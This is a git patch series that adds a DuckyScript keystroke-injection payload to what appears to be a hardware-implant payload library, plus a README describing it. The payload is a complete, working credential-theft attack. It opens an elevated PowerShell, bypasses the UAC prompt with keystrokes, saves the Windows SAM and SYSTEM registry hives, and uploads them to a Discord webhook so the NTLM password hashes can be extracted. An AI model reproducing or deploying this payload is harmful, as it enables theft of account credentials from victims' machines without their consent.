From 15f8f25701bacc1816c1f942268517cf2d14f22b Mon Sep 17 00:00:00 2001 From: Luu <112649910+luu176@users.noreply.github.com> Date: Wed, 25 Sep 2024 00:18:39 +0200 Subject: [PATCH 1/4] Create payload.txt --- .../ntlm_exfiltration/payload.txt | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/payload.txt diff --git a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt new file mode 100644 index 0000000..ee2b9d6 --- /dev/null +++ b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt @@ -0,0 +1,34 @@ +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: luu176 + + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF +END_EXTENSION + +DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE +GUI d +DELAY 1000 +GUI r +DELAY 1000 +STRINGLN powershell Start-Process powershell -Verb runAs +DELAY 3000 +LEFTARROW +ENTER +DELAY 3000 +STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close() +DELAY 500 +GUI d From c898ed7858a76b584333672f2873b219d9f17a56 Mon Sep 17 00:00:00 2001 From: Luu <112649910+luu176@users.noreply.github.com> Date: Wed, 25 Sep 2024 00:20:06 +0200 Subject: [PATCH 2/4] Create README.md --- .../exfiltration/ntlm_exfiltration/README.md | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/README.md diff --git a/payloads/library/exfiltration/ntlm_exfiltration/README.md b/payloads/library/exfiltration/ntlm_exfiltration/README.md new file mode 100644 index 0000000..acba0c3 --- /dev/null +++ b/payloads/library/exfiltration/ntlm_exfiltration/README.md @@ -0,0 +1,28 @@ +# Exfiltrate NTLM Hash - Windows ✅ + +A script used to exfiltrate the NTLM hash on a Windows machine. + +## Description + +A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. + +### Settings + +* Set the Discord webhook URL +* Ensure the webhook permissions are configured + +## Credits + +
+
+
+
+ Github + |
+